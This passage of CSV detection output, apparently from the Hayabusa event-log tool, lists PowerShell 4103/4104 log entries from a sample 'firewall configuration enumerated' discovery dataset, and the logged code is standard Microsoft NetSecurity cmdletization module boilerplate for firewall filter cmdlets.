System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System 
Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 
($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallSecurityFilter 
",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.879 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' function Set-NetFirewallSecurityFilter { 
[CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
